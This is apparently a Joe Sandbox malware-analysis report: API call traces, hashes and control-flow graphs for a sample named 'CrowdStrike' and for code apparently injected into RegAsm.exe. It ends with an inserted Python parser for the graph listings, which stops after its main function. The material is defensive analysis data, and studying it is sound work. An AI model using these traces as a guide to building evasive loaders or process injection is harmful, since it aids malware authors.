                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                        • String ID:
                                                                        • API String ID: 2883127279-0
                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                        • String ID: HideWindow
                                                                        • API String ID: 1249568736-780306582
                                                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                        APIs
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                        • String ID: !N~
                                                                        • API String ID: 623250636-529124213
                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405C48
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3509786178-2769509956
                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                        Execution Graph

                                                                        Execution Coverage: 16.1%
                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 70
                                                                        Total number of Limit Nodes: 1
                                                                        execution_graph 10004 cf0848 10005 cf086c 10004->10005 10006 cf0927 10005->10006 10012 cf0b00 10005->10012 10016 cf0b10 10005->10016 10007 cf096b 10006->10007 10010 cf0b00 2 API calls 10006->10010 10011 cf0b10 2 API calls 10006->10011 10010->10007 10011->10007 10020 cf5045 10012->10020 10030 cf5090 10012->10030 10013 cf0b2c 10013->10006 10017 cf0b2c 10016->10017 10018 cf5045 2 API calls 10016->10018 10019 cf5090 2 API calls 10016->10019 10017->10006 10018->10017 10019->10017 10022 cf4ffc 10020->10022 10021 cf52a7 10061 cf4cec 10021->10061 10022->10020 10024 cf52d5 10022->10024 10040 cf59d9 10022->10040 10044 cf5a10 10022->10044 10048 cf5a00 10022->10048 10052 cf59e8 10022->10052 10056 cf5a48 10022->10056 10024->10013 10032 cf50f3 10030->10032 10031 cf52d5 10031->10013 10032->10031 10035 cf59d9 DuplicateHandle 10032->10035 10036 cf5a48 DuplicateHandle 10032->10036 10037 cf59e8 DuplicateHandle 10032->10037 10038 cf5a00 DuplicateHandle 10032->10038 10039 cf5a10 DuplicateHandle 10032->10039 10033 cf52a7 10034 cf4cec MessageBoxW 10033->10034 10034->10031 10035->10033 10036->10033 10037->10033 10038->10033 10039->10033 10041 cf59f1 10040->10041 10065 cf5010 10041->10065 10045 cf5a20 10044->10045 10047 cf5a3d 10045->10047 10073 cf5020 10045->10073 10047->10021 10049 cf5a20 10048->10049 10050 cf5a3d 10049->10050 10051 cf5020 DuplicateHandle 10049->10051 10050->10021 10051->10050 10053 cf59f1 10052->10053 10054 cf5010 DuplicateHandle 10053->10054 10055 cf59fc 10054->10055 10055->10021 10058 cf5a10 10056->10058 10060 cf5a57 10056->10060 10057 cf5a3d 10057->10021 10058->10057 10059 cf5020 DuplicateHandle 10058->10059 10059->10057 10060->10021 10062 cf8700 MessageBoxW 10061->10062 10064 cf878c 10062->10064 10064->10024 10066 cf501b 10065->10066 10067 cf6c5a 10066->10067 10069 cf64a0 10066->10069 10070 cf64ab 10069->10070 10071 cf5a10 DuplicateHandle 10070->10071 10072 cf6d39 10070->10072 10071->10072 
10072->10067 10074 cf502b 10073->10074 10078 cf6608 10074->10078 10082 cf6618 10074->10082 10075 cf6163 10075->10047 10079 cf660d 10078->10079 10085 cf5ea4 10079->10085 10083 cf5ea4 DuplicateHandle 10082->10083 10084 cf6646 10082->10084 10083->10084 10084->10075 10086 cf6680 DuplicateHandle 10085->10086 10087 cf6646 10086->10087 10087->10075 10088 cf8280 10089 cf82cf 10088->10089 10092 cf7e7c 10089->10092 10094 cf8370 EnumThreadWindows 10092->10094 10095 cf8350 10094->10095

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 438 cf7e6c-cf83b2 441 cf83be-cf83ee EnumThreadWindows 438->441 442 cf83b4 438->442 443 cf83f7-cf8424 441->443 444 cf83f0-cf83f6 441->444 445 cf83bc 442->445 444->443 445->441
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 263c444de3909c1cf740694ac4958b1d512c027fee2c2741c91a00d32571282d
                                                                        • Instruction ID: ceb0a2ede26e655ce7df782e92c437ee505562c50fb44f3f2537cf74eea6f40b
                                                                        • Opcode Fuzzy Hash: 263c444de3909c1cf740694ac4958b1d512c027fee2c2741c91a00d32571282d
                                                                        • Instruction Fuzzy Hash: 602190B19042498FDB10CF99C844BEEFBF4EF48310F04846AD498A7360D778A948CFA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 448 cf5ea4-cf6714 DuplicateHandle 450 cf671d-cf673a 448->450 451 cf6716-cf671c 448->451 451->450
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CF6646,?,?,?,?,?), ref: 00CF6707
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 8ff58a0079ad1274056a36b9aaf6a4d412520aba7229c9a54c256eeb0e08c5de
                                                                        • Instruction ID: a7bb2dd601b3016244cee046896016c00259c4197c9a64918799413ad67379f0
                                                                        • Opcode Fuzzy Hash: 8ff58a0079ad1274056a36b9aaf6a4d412520aba7229c9a54c256eeb0e08c5de
                                                                        • Instruction Fuzzy Hash: 242116B5900208EFDB10CFAAD984AEEBBF4EB48314F14841AE954B3310D374A940CFA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 454 cf6679-cf6714 DuplicateHandle 455 cf671d-cf673a 454->455 456 cf6716-cf671c 454->456 456->455
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CF6646,?,?,?,?,?), ref: 00CF6707
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 691c342c3795a5cddc900fdb1b63ab30f2f72e73d7df6aa5a750e1b34e9a1fcd
                                                                        • Instruction ID: 6445c00ead4657e9843c12d432ef03e2eaacfd69750aefca098a4423d19c6153
                                                                        • Opcode Fuzzy Hash: 691c342c3795a5cddc900fdb1b63ab30f2f72e73d7df6aa5a750e1b34e9a1fcd
                                                                        • Instruction Fuzzy Hash: D621E3B5901249AFDB10CFAAD584ADEBBF4EB48324F14841AE958A7210D378A944CFA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 459 cf7e7c-cf83b2 461 cf83be-cf83ee EnumThreadWindows 459->461 462 cf83b4 459->462 463 cf83f7-cf8424 461->463 464 cf83f0-cf83f6 461->464 465 cf83bc 462->465 464->463 465->461
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 54003230b5556fbb3b6bedc4f2cbe77eeba6d3ce2d9be5e6c8256eee7e88c2aa
                                                                        • Instruction ID: 9fa9a0d558eb4985322fcd6c3961ead26858f46d83af7b139e198d75c69a485d
                                                                        • Opcode Fuzzy Hash: 54003230b5556fbb3b6bedc4f2cbe77eeba6d3ce2d9be5e6c8256eee7e88c2aa
                                                                        • Instruction Fuzzy Hash: FE214CB19042098FDB54CF9AC844BEEFBF4EB48310F148429D554A7360DB74A948CFA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 468 cf8368-cf83b2 469 cf83be-cf83ee EnumThreadWindows 468->469 470 cf83b4 468->470 471 cf83f7-cf8424 469->471 472 cf83f0-cf83f6 469->472 473 cf83bc 470->473 472->471 473->469
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 26d0e2221b6603de15cbe852792cf400e437e980dfac219ac73475ed3dd0eaf2
                                                                        • Instruction ID: d594967a39082453af3a01ba7928f2be246385c69bac29669365badf0132699b
                                                                        • Opcode Fuzzy Hash: 26d0e2221b6603de15cbe852792cf400e437e980dfac219ac73475ed3dd0eaf2
                                                                        • Instruction Fuzzy Hash: 75211AB19002499FDB14CF99C844BEEFBF4EB88720F148429D558A7250D7789945CFA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 476 cf4cec-cf8743 478 cf874b-cf874f 476->478 479 cf8745-cf8748 476->479 480 cf8757-cf878a MessageBoxW 478->480 481 cf8751-cf8754 478->481 479->478 482 cf878c-cf8792 480->482 483 cf8793-cf87a7 480->483 481->480 482->483
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: f897661aad370ac51359f40d237bb1d38e741ae43a38dd870d04262bf7526ee6
                                                                        • Instruction ID: 82588457363bc91909973001e20e8d715dfb5cb84386eb2acae3eed5a09689fd
                                                                        • Opcode Fuzzy Hash: f897661aad370ac51359f40d237bb1d38e741ae43a38dd870d04262bf7526ee6
                                                                        • Instruction Fuzzy Hash: 4D2107B69003499FDB10DF9AD884BDEFBF4FB48314F20842EE559A7600C774A948CBA5

                                                                        Control-flow Graph

                                                                        control_flow_graph 485 cf86f8-cf8743 486 cf874b-cf874f 485->486 487 cf8745-cf8748 485->487 488 cf8757-cf878a MessageBoxW 486->488 489 cf8751-cf8754 486->489 487->486 490 cf878c-cf8792 488->490 491 cf8793-cf87a7 488->491 489->488 490->491
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: 43e0ec9552aea663ed5f3587151da39dabbfa188ecb4e936b1030caa33a92c64
                                                                        • Instruction ID: 7197728809bb0335144e6cf95ffed7f6543a549932e62058fca1c7993ee50ddf
                                                                        • Opcode Fuzzy Hash: 43e0ec9552aea663ed5f3587151da39dabbfa188ecb4e936b1030caa33a92c64
                                                                        • Instruction Fuzzy Hash: 112118B59013499FCB10DF99D884ADEFBB4FB48350F10842EE559A7600D7749944CFA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 493 cf87b0-cf87b1 494 cf876b-cf878a MessageBoxW 493->494 495 cf87b3-cf87c7 493->495 496 cf878c-cf8792 494->496 497 cf8793-cf87a7 494->497 499 cf87c9 495->499 500 cf8801 495->500 496->497 502 cf87de-cf87e3 499->502 503 cf87ec-cf87f1 499->503 504 cf87fa-cf87ff 499->504 505 cf87d7-cf87dc 499->505 506 cf87e5-cf87ea 499->506 507 cf87f3-cf87f8 499->507 508 cf87d0-cf87d5 499->508 501 cf8806-cf8807 500->501 502->501 503->501 504->501 505->501 506->501 507->501 508->501
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: 5e7ca2688919fd45b7cc018c41f18f50ab0b0921bd9ef584044fddb2e2d91a27
                                                                        • Instruction ID: aec0c5a570bc32a260d13b58ca21ff2d8807ecdd4405d817f386ebaf4f23d565
                                                                        • Opcode Fuzzy Hash: 5e7ca2688919fd45b7cc018c41f18f50ab0b0921bd9ef584044fddb2e2d91a27
                                                                        • Instruction Fuzzy Hash: F501B17190C348CFDB519B59E9003F87BA0EB11354F64806BE24AA72D2DA39988CC753
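The execution graph and the control-flow graphs above are exported as one flat token stream: a decimal node id, the node's address or address range, optional label words (an API name, or "2 API calls"), and id->id edges. The Python below is an added example, not part of the Joe Sandbox report or its tooling; it parses that stream and answers the question an analyst usually has when reading these listings, namely which basic blocks can reach a given API call (DuplicateHandle, MessageBoxW, EnumThreadWindows in the injected RegAsm.exe region). The two inputs are copied from the first control-flow graph above and from an excerpt of the execution_graph line; the token patterns are inferred from those listings and are an assumption about the export format, not a documented grammar.

```python
import re
from collections import defaultdict, deque

# Token patterns inferred (assumption) from the Joe Sandbox graph listings above:
#   node := <decimal id> <hex addr | hex addr-hex addr> <label words...>
#   edge := <id>-><id>
NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Sample input 1: the first control-flow graph above (process 15, RegAsm.exe),
# copied verbatim from the report.
CFG_TEXT = (
    "control_flow_graph 438 cf7e6c-cf83b2 441 cf83be-cf83ee EnumThreadWindows "
    "438->441 442 cf83b4 438->442 443 cf83f7-cf8424 441->443 444 cf83f0-cf83f6 "
    "441->444 445 cf83bc 442->445 444->443 445->441"
)

# Sample input 2: an excerpt of the execution_graph line above (same process).
EXEC_TEXT = (
    "execution_graph 10030 cf5090 10032 cf50f3 10030->10032 10031 cf52d5 "
    "10031->10013 10032->10031 10035 cf59d9 DuplicateHandle 10032->10035 "
    "10036 cf5a48 DuplicateHandle 10032->10036 10033 cf52a7 10034 cf4cec "
    "MessageBoxW 10033->10034 10034->10031 10035->10033 10036->10033"
)


def parse_graph(text):
    """Return (nodes, edges); nodes maps id -> {'addr': str, 'label': [str]}."""
    tokens = text.split()
    if tokens and tokens[0].endswith("_graph"):
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        # A decimal id immediately followed by a hex address opens a node;
        # a bare number inside a label ("2 API calls") is not followed by hex.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is not None:
            nodes[current]["label"].append(tok)   # label word for the open node
        i += 1
    return nodes, edges


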